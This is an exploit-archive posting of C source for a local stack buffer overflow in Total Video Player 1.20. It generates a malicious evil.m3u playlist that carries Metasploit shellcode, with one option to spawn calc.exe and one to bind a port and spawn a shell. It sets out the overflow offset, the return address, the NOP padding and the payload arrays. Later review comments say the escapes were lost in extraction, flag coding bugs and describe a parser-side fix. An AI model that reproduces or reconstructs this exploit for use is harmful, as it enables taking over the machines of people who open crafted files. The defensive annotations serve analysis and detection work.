
tvp120-overflow.txt

Posted on 08 February 2008

/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
 This exploit spawns Calc.exe or binds a port and spawns a shell and tested on Windows Xp sp 2.
 I got the ideea to look in a prior version of TVP and surprinse vuln to ,just as V1.30.
 When parsing a crafted .m3u file stack gets corrupted,due a long string,and causes a stack
 overflow.We get control of the EBP and EIP registers.The ESP register points exactly after
 the retaddress position.
 [corrupted stack] [EIP->points here][ESP->points here]
 So do a jmp back and a JMP ESP and it points to a specific part of the stack that I want.
 Credits to finding this bug && sploit go to fl0 fl0w.
 Vendor not informed yet.
 Special THANKS to Expanders !!!! */

/* NOTE(review): the listing as rendered here has lost its escape characters during
 * extraction: the backslash before the closing quote of FIRST is unescaped, every
 * printf string below ends in a bare space where a newline escape would be expected,
 * and the char arrays carry no escape prefixes.  The file therefore does not build
 * as shown and the arrays hold the visible ASCII text, not byte values.  Read it as
 * documentation of the malformed-playlist shape, which is what a parser hardening
 * fix or a detection rule needs. */

#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

/* Playlist prefix and suffix that wrap the single oversized path entry written to
 * EVILFILE (FIRST + generated buffer + LAST). */
#define FIRST "#EXTM3U #EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho D:\"
#define LAST ".mp3 "
/* Byte position inside the generated path string at which the 4-byte retaddress is
 * placed; the header comment reports this is where the saved EIP is overwritten. */
#define OFFSET 545
#define EVILFILE "evil.m3u"

//shellcode from metasploit
/* scz1 is emitted for menu choice {1}, scz2 for choice {2}; see Notes() for the menu.
 * NOTE(review): see the extraction caveat at the top of the file — contents as shown
 * are literal text. */
char scz1[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57"
"x70x63";

char scz2[]=
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x50"
"x8axfax90x83xebxfcxe2xf4xacxe0x11xddxb8x73x05x6f"
"xafxeax71xfcx74xaex71xd5x6cx01x86x95x28x8bx15x1b"
"x1fx92x71xcfx70x8bx11xd9xdbxbex71x91xbexbbx3ax09"
"xfcx0ex3axe4x57x4bx30x9dx51x48x11x64x6bxdexdexb8"
"x25x6fx71xcfx74x8bx11xf6xdbx86xb1x1bx0fx96xfbx7b"
"x53xa6x71x19x3cxaexe6xf1x93xbbx21xf4xdbxc9xcax1b"
"x10x86x71xe0x4cx27x71xd0x58xd4x92x1ex1ex84x16xc0"
"xafx5cx9cxc3x36xe2xc9xa2x38xfdx89xa2x0fxdex05x40"
"x38x41x17x6cx6bxdax05x46x0fx03x1fxf6xd1x67xf2x92"
"x05xe0xf8x6fx80xe2x23x99xa5x27xadx6fx86xd9xa9xc3"
"x03xd9xb9xc3x13xd9x05x40x36xe2xebxccx36xd9x73x71"
"xc5xe2x5ex8ax20x4dxadx6fx86xe0xeaxc1x05x75x2axf8"
"xf4x27xd4x79x07x75x2cxc3x05x75x2axf8xb5xc3x7cxd9"
"x07x75x2cxc0x04xdexafx6fx80x19x92x77x29x4cx83xc7"
"xafx5cxafx6fx80xecx90xf4x36xe2x99xfdxd9x6fx90xc0"
"x09xa3x36x19xb7xe0xbex19xb2xbbx3ax63xfax74xb8xbd"
"xaexc8xd6x03xddxf0xc2x3bxfbx21x92xe2xaex39xecx6f"
"x25xcex05x46x0bxddxa8xc1x01xdbx90x91x01xdbxafxc1"
"xafx5ax92x3dx89x8fx34xc3xafx5cx90x6fxafxbdx05x40"
"xdbxddx06x13x94xeex05x46x02x75x2axf8x2ex52x18xe3"
"x03x75x2cx6fx80x8axfax90";

/* Declared but never referenced by main(); the 12-byte gap left after retaddress is
 * filled only by the 0x90 memset below. */
char jmpback[] = "xE9xDExFDxFFxFF";

void Notes();

/* Writes EVILFILE: a one-entry .m3u whose path component is OFFSET bytes of 0x90,
 * the 4-byte retaddress, 12 more 0x90 bytes, the chosen payload array, and a NUL.
 * From a defender's view that shape is the thing to detect and to reject: a path
 * entry hundreds of bytes long consisting mostly of one repeated byte, far beyond
 * any real file name.  The parser-side fix is to bound the entry length before it is
 * copied into a fixed-size stack buffer. */
int main() {
    FILE *p;
    /* NOTE(review): buffer is only assigned inside case 1 and case 2, yet free(buffer)
     * at the end runs on every path — freeing an indeterminate pointer is undefined
     * behaviour for any other input.  Initialising it to NULL would make free() a no-op. */
    unsigned char *buffer;
    unsigned int offset=0;
    /* Return-address value chosen by the author for their target build; nothing in
     * this file derives it, so it is opaque here.  It contains no 0x00 byte, which
     * is what lets the buffer pass through a %s conversion intact. */
    unsigned int retaddress=0x015EE557;
    int input=0;
    Notes();
    if((p=fopen(EVILFILE,"wb"))==NULL) {
        printf("error ");
        /* NOTE(review): exits with status 0 on failure. */
        exit(0);
    }
    /* Return value unchecked; on non-numeric input, input stays 0 and no case matches,
     * leaving p open and buffer unassigned. */
    scanf("%d",&input);
    switch(input) {
    case 1:
        /* Allocation is exactly OFFSET + 4 + 12 + strlen(scz1) + 1 bytes, which is
         * precisely the number written below.  malloc result is not checked. */
        buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz1)+12);
        /* offset is still 0 here, so the whole allocation is pre-filled with 0x90. */
        memset(buffer+offset,0x90,OFFSET+5+strlen(scz1)+12);
        offset=OFFSET;
        memcpy(buffer+offset,&retaddress,4);
        offset=OFFSET+4;
        /* Skip 12 bytes of the 0x90 fill before the payload. */
        offset+=12;
        memcpy(buffer+offset,scz1,strlen(scz1));
        offset+=strlen(scz1);
        /* NUL terminator so the %s below stops at the end of the payload. */
        memset(buffer+offset,0x00,1);
        fprintf(p,"%s%s%s",FIRST,buffer,LAST);
        fclose(p);
        break;
    case 2:
        /* Same layout as case 1 with scz2 as the payload. */
        buffer=(unsigned char *)malloc(OFFSET+5+strlen(scz2)+12);
        memset(buffer+offset,0x90,OFFSET+5+strlen(scz2)+12);
        offset=OFFSET;
        memcpy(buffer+offset,&retaddress,4);
        offset=OFFSET+4;
        offset+=12;
        memcpy(buffer+offset,scz2,strlen(scz2));
        offset+=strlen(scz2);
        memset(buffer+offset,0x00,1);
        fprintf(p,"%s%s%s",FIRST,buffer,LAST);
        fclose(p);
        break;
    /* NOTE(review): no default case — p is never closed for other inputs. */
    }
    free(buffer);
    return 0;
}

/* Prints the banner and the two menu choices that main() reads with scanf().
 * The trailing space in each string is where a newline escape stood before the
 * listing lost its escape characters (see the note at the top of the file). */
void Notes() {
    printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ");
    printf("Total Video Player V1.20 .M3u File Local Stack Buffer Overflow ");
    printf("Credits for finding this bug&&sploit go to fl0 fl0w ");
    printf("SPECIAL THANKS TO EXPANDERS ");
    printf("{1}Spawn Calc.exe ");
    printf("{2}Bind port&&spanw a shell ");
    printf("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ");
}

 
